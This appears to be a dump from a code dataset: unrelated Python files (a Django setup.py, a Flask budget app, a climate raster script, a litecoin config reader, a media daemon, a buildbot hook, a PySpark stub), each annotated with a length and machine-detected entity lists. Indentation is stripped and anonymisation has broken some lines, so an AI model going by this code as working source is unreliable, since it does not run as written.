import codecs
from setuptools import setup, find_packages
url='http://github.com/mila/django-noticebox/tree/master'
try:
long_description = codecs.open('README.rst', "r", "utf-8").read()
except IOError:
long_description = "See %s" % url
setup(
name='django-noticebox',
version=__import__("noticebox").__version__,
description='Django-noticebox is a reusable Django application which '
'provides functionality for sending notices to site users. '
'The notices can be displayed when user signs in, '
'sent by email or both.',
long_description=long_description,
author='Miloslav Pojman',
dummy@email.com',
url=url,
packages=find_packages(),
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
include_package_data=True,
zip_safe=False,
)
| 1,086 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', "http://github.com/mila/django-noticebox/tree/master'"], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'README.rs'], ['URL', 'email.com']] |
90 | from flask import Flask, render_template, request, redirect
from sql import select
# Create Flask app
app = Flask(__name__)
# API Blueprint
from api import api
app.register_blueprint(api, url_prefix="/api")
# Load Index page
@app.route("/")
def index():
return render_template("index.html")
# --------------- BILLS --------------- #
# Bills page
@app.route("/bills")
def bills():
bills = select("bills")
return render_template("bills.html", bills=bills)
# Add Bill page
@app.route("/bills/add")
def bills_add():
return render_template("bills_add.html")
# Edit Bill page
@app.route("/bills/edit")
def bills_edit():
return render_template("bills_edit.html")
# --------------- SPENDING --------------- #
# Spending page
@app.route("/spending")
def spending():
spending = select("spending")
return render_template("spending.html", spending=spending)
# Add Spending page
@app.route("/spending/add")
def spending_add():
accounts = select("accounts")
return render_template("spending_add.html", accounts=accounts)
# Edit Spending page
@app.route("/spending/edit")
def spending_edit():
return render_template("spending_edit.html")
# --------------- ACCOUNTS --------------- #
# Accounts page
@app.route("/accounts")
def accounts():
accounts = select("accounts")
return render_template("accounts.html", accounts=accounts)
# Add Account page
@app.route("/accounts/add")
def accounts_add():
return render_template("accounts_add.html")
# Edit Account page
@app.route("/accounts/edit")
def accounts_edit():
return render_template("accounts_edit.html")
# Run Flask app on load
if __name__ == "__main__":
app.run(debug=True, host="127.0.0.1")
| 1,785 | [['LOCATION', 'app.register_blueprint(api'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.re'], ['URL', 'app.ro'], ['URL', 'index.ht'], ['URL', 'app.ro'], ['URL', 'bills.ht'], ['URL', 'app.ro'], ['URL', 'add.ht'], ['URL', 'app.ro'], ['URL', 'edit.ht'], ['URL', 'app.ro'], ['URL', 'spending.ht'], ['URL', 'app.ro'], ['URL', 'add.ht'], ['URL', 'app.ro'], ['URL', 'edit.ht'], ['URL', 'app.ro'], ['URL', 'accounts.ht'], ['URL', 'app.ro'], ['URL', 'add.ht'], ['URL', 'app.ro'], ['URL', 'edit.ht'], ['URL', 'app.ru']] |
91 | # # # # # compare tasmin, tas, tasmax in a timeseries of GeoTiff files # # # #
def transform_from_latlon( lat, lon ):
''' simple way to make an affine transform from lats and lons coords '''
from affine import Affine
lat = np.asarray( lat )
lon = np.asarray(lon)
trans = Affine.translation(lon[0], lat[0])
scale = Affine.scale(lon[1] - lon[0], lat[1] - lat[0])
return trans * scale
def rasterize( shapes, coords, latitude='latitude', longitude='longitude', fill=None, **kwargs ):
'''
Rasterize a list of (geometry, fill_value) tuples onto the given
xarray coordinates. This only works for 1d latitude and longitude
arrays.
'''
from rasterio import features
if fill == None:
fill = np.nan
transform = transform_from_latlon( coords[ latitude ], coords[ longitude ] )
out_shape = ( len( coords[ latitude ] ), len( coords[ longitude ] ) )
raster = features.rasterize(shapes, out_shape=out_shape,
fill=fill, transform=transform,
dtype=float, **kwargs)
spatial_coords = {latitude: coords[latitude], longitude: coords[longitude]}
return xr.DataArray(raster, coords=spatial_coords, dims=(latitude, longitude))
def sort_files( files, split_on='_', elem_month=-2, elem_year=-1 ):
'''
sort a list of files properly using the month and year parsed
from the filename. This is useful with SNAP data since the standard
is to name files like '<prefix>_MM_YYYY.tif'. If sorted using base
Pythons sort/sorted functions, things will be sorted by the first char
of the month, which makes thing go 1, 11, ... which sucks for timeseries
this sorts it properly following SNAP standards as the default settings.
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-2. For SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sorted `list` by month and year ascending.
'''
import pandas as pd
months = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ]
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( {'fn':files, 'month':months, 'year':years} )
df_sorted = df.sort_values( ['year', 'month' ] )
return df_sorted.fn.tolist()
def only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ):
'''
return new list of filenames where they are truncated to begin:end
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
begin = [int] four digit integer year of the begin time default:1901
end = [int] four digit integer year of the end time default:2100
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sliced `list` to begin and end year.
'''
import pandas as pd
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( { 'fn':files, 'year':years } )
df_slice = df[ (df.year >= begin ) & (df.year <= end ) ]
return df_slice.fn.tolist()
def masked_mean( fn, bounds=None ):
''' get mean of the full domain since the data are already clipped
mostly used for processing lots of files in parallel.'''
import numpy as np
import rasterio
with rasterio.open( fn ) as rst:
if bounds:
window = rst.window( *bounds )
else:
window = rst.window( *rst.bounds )
mask = (rst.read_masks( 1 ) == 0)
arr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask )
return np.mean( arr )
if __name__ == '__main__':
import os, glob
import geopandas as gpd
import numpy as np
import xarray as xr
import matplotlib
matplotlib.use( 'agg' )
from matplotlib import pyplot as plt
from pathos.mp_map import mp_map
import pandas as pd
import geopandas as gpd
# args / set working dir
base_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data'
os.chdir( base_dir )
# scenarios = ['rcp60', 'rcp85']
scenarios = ['historical']
shp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp'
shp = gpd.read_file( shp_fn )
bounds = shp.bounds
# models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
# models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
models = ['ts323']
variables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#,
# models = ['CRU_TS323']
# begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]]
begin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]]
for scenario in scenarios:
for variables in variables_list:
for m in models:
for begin, end in begin_end_groups: # not fully wired-up yet
if m == 'ts323':
old_dir = 'PI:KEY'
# begin = 1950
# end = 1965
else:
if scenario == 'historical':
old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models'
# begin = 1950
# end = 1965
else:
old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models'
# begin = 2095
# end = 2100
figsize = (16,9)
out = {}
for v in variables:
path = os.path.join( base_dir,'downscaled', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v ] = mp_map( masked_mean, files, nproc=4 )
if v == 'tas' or v == 'pr':
if m == 'ts323':
path = os.path.join( old_dir, v )
print( path )
else:
path = os.path.join( old_dir, scenario, m, v )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 )
# nofix
path = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 )
plot_df = pd.DataFrame( out )
plot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' )
# sort the columns for output plotting cleanliness:
if 'tas' in variables:
col_list = ['tasmax', 'tas_old', 'tas', 'tasmin']
elif 'pr' in variables:
col_list = ['pr', 'pr_old', 'pr_nofix']
plot_df = plot_df[ col_list ] # get em in the order for plotting
if v == 'pr':
plot_df = plot_df.round()[['pr','pr_old']]
# now plot the dataframe
if begin == end:
title = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin )
else:
title = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end )
if 'tas' in variables:
colors = ['red', 'black', 'blue', 'red' ]
else:
colors = [ 'blue', 'black', 'darkred' ]
ax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors )
output_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' )
if not os.path.exists( output_dir ):
os.makedirs( output_dir )
# now plot the dataframe
out_metric_fn = 'temps'
if 'pr' in variables:
out_metric_fn = 'prec'
if begin == end:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) )
else:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) )
plt.savefig( output_filename, dpi=400 )
plt.close()
# # # PRISM TEST VERSION DIFFERENCES # # # # # # #
# import rasterio
# import numpy as np
# import os, glob, itertools
# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism'
# variables = [ 'tmax', 'tmin' ]
# for variable in variables:
# ak_olds = sorted( glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) )
# ak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) )
# olds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ])
# news = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ])
# out = olds - news
# out[ (olds == -9999.0) | (news == -9999.0) ] = 0
# uniques = np.unique( out )
# uniques[ uniques > 0.01 ]
| 9,041 | [['PERSON', 'tasmax'], ['NRP', 'GeoTiff'], ['PERSON', 'lons'], ['PERSON', 'Rasterize'], ['LOCATION', 'split_on='], ['DATE_TIME', 'the month and year'], ['DATE_TIME', 'the month'], ['DATE_TIME', '11'], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'year'], ['DATE_TIME', "'year'"], ['DATE_TIME', "'month'"], ['LOCATION', 'split_on='], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'end year'], ['PERSON', 'geopandas'], ['PERSON', 'geopandas'], ['PERSON', 'os.chdir'], ['DATE_TIME', '1916'], ['DATE_TIME', '2000'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'glob'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'Affine.tr'], ['URL', 'Affine.sc'], ['URL', 'np.na'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'os.path.ba'], ['URL', 'df.so'], ['URL', 'sorted.fn.to'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'df.ye'], ['URL', 'df.ye'], ['URL', 'slice.fn.to'], ['URL', 'rst.bo'], ['URL', 'rst.re'], ['URL', 'np.ma.ma'], ['URL', 'rst.re'], ['URL', 'np.me'], ['URL', 'matplotlib.us'], ['URL', 'pathos.mp'], ['URL', 'os.ch'], ['URL', 'StudyArea.sh'], ['URL', 'gpd.re'], ['URL', 'shp.bo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'df.in'], ['URL', 'df.ro'], ['URL', 'df.pl'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'plt.sa'], ['URL', 'plt.cl'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'np.ar'], ['URL', 'np.ar']] |
92 | # Copyright (c) 2010 Witchspace dummy@email.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
Utilities for reading litecoin configuration files.
"""
def read_config_file(filename):
"""
Read a simple ``'='``-delimited config file.
Raises :const:`IOError` if unable to open file, or :const:`ValueError`
if an parse error occurs.
"""
f = open(filename)
try:
cfg = {}
for line in f:
line = line.strip()
if line and not line.startswith("#"):
try:
(key, value) = line.split('=', 1)
cfg[key] = value
except ValueError:
pass # Happens when line has no '=', ignore
finally:
f.close()
return cfg
def read_default_config(filename=None):
"""
Read litecoin default configuration from the current user's home directory.
Arguments:
- `filename`: Path to a configuration file in a non-standard location (optional)
"""
if filename is None:
import os
import platform
home = os.getenv("HOME")
if not home:
raise IOError("Home directory not defined, don't know where to look for config file")
if platform.system() == "Darwin":
location = 'Library/Application Support/Litecoin/litecoin.conf'
else:
location = '.litecoin/litecoin.conf'
filename = os.path.join(home, location)
elif filename.startswith("~"):
import os
filename = os.path.expanduser(filename)
try:
return read_config_file(filename)
except (IOError, ValueError):
pass # Cannot read config file, ignore
| 2,706 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['LOCATION', 'Witchspace'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'os.ge'], ['URL', 'platform.sy'], ['URL', 'litecoin.co'], ['URL', 'litecoin.co'], ['URL', 'os.path.jo'], ['URL', 'filename.st'], ['URL', 'os.pa']] |
93 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Smewt - A smart collection manager
# Copyright (c) 2010 Nicolas Wack dummy@email.com
#
# Smewt is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Smewt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from pygoo import MemoryObjectGraph, Equal, ontology
from guessit.slogging import setupLogging
from smewt import config
from smewt.ontology import Episode, Movie, Subtitle, Media, Config
from smewt.base import cache, utils, Collection
from smewt.base.taskmanager import TaskManager, FuncTask
from smewt.taggers import EpisodeTagger, MovieTagger
from smewt.plugins.feedwatcher import FeedWatcher
from threading import Timer
import smewt
import time
import os
import logging
log = logging.getLogger(__name__)
class VersionedMediaGraph(MemoryObjectGraph):
def __init__(self, *args, **kwargs):
super(VersionedMediaGraph, self).__init__(*args, **kwargs)
def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()):
result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps)
if isinstance(result, Media):
result.lastModified = time.time()
return result
def clear_keep_config(self):
# we want to keep our config object untouched
tmp = MemoryObjectGraph()
tmp.add_object(self.config)
super(VersionedMediaGraph, self).clear()
self.add_object(tmp.find_one(Config))
def __getattr__(self, name):
# if attr is not found and starts with an upper case letter, it might be the name
# of one of the registered classes. In that case, return a function that would instantiate
# such an object in this graph
if name[0].isupper() and name in ontology.class_names():
def inst(basenode = None, **kwargs):
result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs)
if isinstance(result, Media):
result.lastModified = time.time()
return result
return inst
raise AttributeError, name
@property
def config(self):
try:
return self.find_one(Config)
except ValueError:
return self.Config()
class SmewtDaemon(object):
def __init__(self):
super(SmewtDaemon, self).__init__()
# Note: put log file in data dir instead of log dir so that it is
# accessible through the user/ folder static view
self.logfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.log')
setupLogging(filename=self.logfile, with_time=True, with_thread=True)
if smewt.config.PERSISTENT_CACHE:
self.loadCache()
# get a TaskManager for all the import tasks
self.taskManager = TaskManager()
# get our main graph DB
self.loadDB()
# get our collections: series and movies for now
self.episodeCollection = Collection(name = 'Series',
# import episodes and their subtitles too
validFiles = [ Episode.isValidEpisode,
Subtitle.isValidSubtitle ],
mediaTagger = EpisodeTagger,
dataGraph = self.database,
taskManager = self.taskManager)
self.movieCollection = Collection(name = 'Movie',
# import movies and their subtitles too
validFiles = [ Movie.isValidMovie,
Subtitle.isValidSubtitle ],
mediaTagger = MovieTagger,
dataGraph = self.database,
taskManager = self.taskManager)
if config.REGENERATE_THUMBNAILS:
# launch the regeneration of the thumbnails, but only after everything
# is setup and we are able to serve requests
Timer(3, self.regenerateSpeedDialThumbnails).start()
if self.database.config.get('tvuMldonkeyPlugin'):
# load up the feed watcher
self.feedWatcher = FeedWatcher(self)
# FIXME: this should go into a plugin.init() method
from smewt.plugins import mldonkey
mldonkey.send_command('vm')
# do not rescan as it would be too long and we might delete some files that
# are on an unaccessible network share or an external HDD
self.taskManager.add(FuncTask('Update collections', self.updateCollections))
def quit(self):
log.info('SmewtDaemon quitting...')
self.taskManager.finishNow()
try:
self.feedWatcher.quit()
except AttributeError:
pass
self.saveDB()
if smewt.config.PERSISTENT_CACHE:
self.saveCache()
log.info('SmewtDaemon quitting OK!')
def _cacheFilename(self):
return utils.path(smewt.dirs.user_cache_dir, 'Smewt.cache',
createdir=True)
def loadCache(self):
cache.load(self._cacheFilename())
def saveCache(self):
cache.save(self._cacheFilename())
def clearCache(self):
cache.clear()
cacheFile = self._cacheFilename()
log.info('Deleting cache file: %s' % cacheFile)
try:
os.remove(cacheFile)
except OSError:
pass
def loadDB(self):
dbfile = smewt.settings.get('database_file')
if not dbfile:
dbfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.database',
createdir=True)
smewt.settings.set('database_file', dbfile)
log.info('Loading database from: %s', dbfile)
self.database = VersionedMediaGraph()
try:
self.database.load(dbfile)
except:
log.warning('Could not load database %s', dbfile)
def saveDB(self):
dbfile = smewt.settings.get('database_file')
log.info('Saving database to %s', dbfile)
self.database.save(dbfile)
def clearDB(self):
log.info('Clearing database...')
self.database.clear_keep_config()
self.database.save(smewt.settings.get('database_file'))
def updateCollections(self):
self.episodeCollection.update()
self.movieCollection.update()
def rescanCollections(self):
self.episodeCollection.rescan()
self.movieCollection.rescan()
def _regenerateSpeedDialThumbnails(self):
import shlex, subprocess
from PIL import Image
from StringIO import StringIO
webkit2png = (subprocess.call(['which', 'webkit2png'], stdout=subprocess.PIPE) == 0)
if not webkit2png:
log.warning('webkit2png not found. please run: "python setup.py install" from within the 3rdparty/webkit2png folder')
return
def gen(path, filename):
width, height = 200, 150
log.info('Creating %dx%d screenshot for %s...' % (width, height, path))
filename = utils.path(smewt.dirs.user_data_dir, 'speeddial', filename, createdir=True)
cmd = 'webkit2png -g 1000 600 "http://localhost:6543%s"' % path
screenshot, _ = subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE).communicate()
im = Image.open(StringIO(screenshot))
im.thumbnail((width, height), Image.ANTIALIAS)
im.save(filename, "PNG")
gen('/movies', 'allmovies.png')
gen('/movies/table', 'moviestable.png')
gen('/movies/recent', 'recentmovies.png')
gen('/series', 'allseries.png')
gen('/series/suggestions', 'episodesuggestions.png')
gen('/feeds', 'feeds.png')
def regenerateSpeedDialThumbnails(self):
self.taskManager.add(FuncTask('Regenerate thumbnails',
self._regenerateSpeedDialThumbnails))
| 8,704 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Nicolas Wack'], ['LOCATION', 'self).__getattr__(name)(basenode'], ['PERSON', 'Smewt.log'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = EpisodeTagger'], ['NRP', 'dataGraph'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = MovieTagger'], ['PERSON', 'self.taskManager.finishNow'], ['PERSON', 'self.saveCache'], ['PERSON', 'self.database = VersionedMediaGraph'], ['PERSON', 'utils.path(smewt.dirs.user_data_dir'], ['LOCATION', 'Image'], ['PERSON', "self.taskManager.add(FuncTask('Regenerate"], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'guessit.sl'], ['URL', 'smewt.ba'], ['URL', 'smewt.ba'], ['URL', 'smewt.pl'], ['URL', 'logging.ge'], ['URL', 'result.la'], ['URL', 'tmp.ad'], ['URL', 'self.co'], ['URL', 'self.ad'], ['URL', 'tmp.fi'], ['URL', 'ontology.cl'], ['URL', 'result.la'], ['URL', 'self.fi'], ['URL', 'self.Co'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.config.PE'], ['URL', 'Episode.is'], ['URL', 'Subtitle.is'], ['URL', 'self.mo'], ['URL', 'Movie.is'], ['URL', 'Subtitle.is'], ['URL', 'config.RE'], ['URL', 'self.re'], ['URL', 'self.database.config.ge'], ['URL', 'plugin.in'], ['URL', 'smewt.pl'], ['URL', 'mldonkey.se'], ['URL', 'self.taskManager.ad'], ['URL', 'log.in'], ['URL', 'self.taskManager.fi'], ['URL', 'self.sa'], ['URL', 'smewt.config.PE'], ['URL', 'self.sa'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'Smewt.ca'], ['URL', 'cache.sa'], ['URL', 'cache.cl'], ['URL', 'log.in'], ['URL', 'os.re'], ['URL', 'smewt.settings.ge'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.settings.se'], ['URL', 'log.in'], ['URL', 'smewt.settings.ge'], ['URL', 'log.in'], ['URL', 'self.database.sa'], ['URL', 'log.in'], ['URL', 'self.database.cl'], ['URL', 'self.database.sa'], ['URL', 'smewt.settings.ge'], ['URL', 'self.mo'], ['URL', 'self.episodeCollection.re'], ['URL', 'self.movieCollection.re'], ['URL', 'subprocess.ca'], ['URL', 'setup.py'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'im.th'], ['URL', 'Image.AN'], ['URL', 'im.sa'], ['URL', 'allmovies.pn'], ['URL', 'moviestable.pn'], ['URL', 'recentmovies.pn'], ['URL', 'allseries.pn'], ['URL', 'episodesuggestions.pn'], ['URL', 'feeds.pn'], ['URL', 'self.taskManager.ad']] |
94 | #!/usr/local/bin/python
#
# BitKeeper hook script.
#
# svn_buildbot.py was used as a base for this file, if you find any bugs or
# errors please email me.
#
# Amar Takhar dummy@email.com
'''
/path/to/bk_buildbot.py --repository "$REPOS" --revision "$REV" --branch \
"<branch>" --bbserver localhost --bbport 9989
'''
import commands
import sys
import os
import re
if sys.version_info < (2, 6):
import sets
# We have hackish "-d" handling here rather than in the Options
# subclass below because a common error will be to not have twisted in
# PYTHONPATH; we want to be able to print that error to the log if
# debug mode is on, so we set it up before the imports.
DEBUG = None
if '-d' in sys.argv:
i = sys.argv.index('-d')
DEBUG = sys.argv[i+1]
del sys.argv[i]
del sys.argv[i]
if DEBUG:
f = open(DEBUG, 'a')
sys.stderr = f
sys.stdout = f
from twisted.internet import defer, reactor
from twisted.python import usage
from twisted.spread import pb
from twisted.cred import credentials
class Options(usage.Options):
optParameters = [
['repository', 'r', None,
"The repository that was changed."],
['revision', 'v', None,
"The revision that we want to examine (default: latest)"],
['branch', 'b', None,
"Name of the branch to insert into the branch field. (REQUIRED)"],
['category', 'c', None,
"Schedular category."],
['bbserver', 's', 'localhost',
"The hostname of the server that buildbot is running on"],
['bbport', 'p', 8007,
"The port that buildbot is listening on"]
]
optFlags = [
['dryrun', 'n', "Do not actually send changes"],
]
def __init__(self):
usage.Options.__init__(self)
def postOptions(self):
if self['repository'] is None:
raise usage.error("You must pass --repository")
class ChangeSender:
def getChanges(self, opts):
"""Generate and stash a list of Change dictionaries, ready to be sent
to the buildmaster's PBChangeSource."""
# first we extract information about the files that were changed
repo = opts['repository']
print "Repo:", repo
rev_arg = ''
if opts['revision']:
rev_arg = '-r"%s"' % (opts['revision'], )
changed = commands.getoutput("bk changes -v %s -d':GFILE:\\n' '%s'" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del changed[0]
change_info = commands.getoutput("bk changes %s -d':USER:\\n$each(:C:){(:C:)\\n}' '%s'" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del change_info[0]
who = change_info.pop(0)
branch = opts['branch']
message = '\n'.join(change_info)
revision = opts.get('revision')
changes = {'who': who,
'branch': branch,
'files': changed,
'comments': message,
'revision': revision}
if opts.get('category'):
changes['category'] = opts.get('category')
return changes
def sendChanges(self, opts, changes):
pbcf = pb.PBClientFactory()
reactor.connectTCP(opts['bbserver'], int(opts['bbport']), pbcf)
d = pbcf.login(credentials.UsernamePassword('change', 'changepw'))
d.addCallback(self.sendAllChanges, changes)
return d
def sendAllChanges(self, remote, changes):
dl = remote.callRemote('addChange', changes)
return dl
def run(self):
opts = Options()
try:
opts.parseOptions()
if not opts['branch']:
print "You must supply a branch with -b or --branch."
sys.exit(1);
except usage.error, ue:
print opts
print "%s: %s" % (sys.argv[0], ue)
sys.exit()
changes = self.getChanges(opts)
if opts['dryrun']:
for k in changes.keys():
print "[%10s]: %s" % (k, changes[k])
print "*NOT* sending any changes"
return
d = self.sendChanges(opts, changes)
def quit(*why):
print "quitting! because", why
reactor.stop()
def failed(f):
print "FAILURE: %s" % f
reactor.stop()
d.addErrback(failed)
d.addCallback(quit, "SUCCESS")
reactor.callLater(60, quit, "TIMEOUT")
reactor.run()
if __name__ == '__main__':
s = ChangeSender()
s.run()
| 4,654 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Amar Takhar dummy@email.com'], ['LOCATION', 'sys.argv'], ['PERSON', 'buildbot'], ['PERSON', 'dryrun'], ['PERSON', 'buildmaster'], ['LOCATION', 'del changed[0]\n\n change_info'], ['PERSON', 'del change_info[0]\n\n '], ['PERSON', 'pbcf'], ['URL', 'buildbot.py'], ['URL', 'email.com'], ['URL', 'buildbot.py'], ['URL', 'sys.ve'], ['URL', 'sys.ar'], ['URL', 'sys.argv.in'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'twisted.int'], ['URL', 'twisted.py'], ['URL', 'twisted.cr'], ['URL', 'usage.er'], ['URL', 'commands.ge'], ['URL', 'commands.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'reactor.co'], ['URL', 'credentials.Us'], ['URL', 'd.ad'], ['URL', 'self.se'], ['URL', 'remote.ca'], ['URL', 'opts.pa'], ['URL', 'usage.er'], ['URL', 'sys.ar'], ['URL', 'self.ge'], ['URL', 'changes.ke'], ['URL', 'self.se'], ['URL', 'reactor.st'], ['URL', 'reactor.st'], ['URL', 'd.ad'], ['URL', 'd.ad'], ['URL', 'reactor.ca'], ['URL', 'reactor.ru'], ['URL', 's.ru']] |
95 | #coding=UTF-8
from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext
from pyspark.sql.types import *
from datetime import date, datetime, timedelta
import sys, re, os
st = datetime.now()
conf = SparkConf().setAppName('PROC_O_LNA_XDXT_CUSTOMER_INFO').setMaster(sys.argv[2])
sc = SparkContext(conf = conf)
sc.setLogLevel('WARN')
if len(sys.argv) > 5:
if sys.argv[5] == "hive":
sqlContext = HiveContext(sc)
else:
sqlContext = SQLContext(sc)
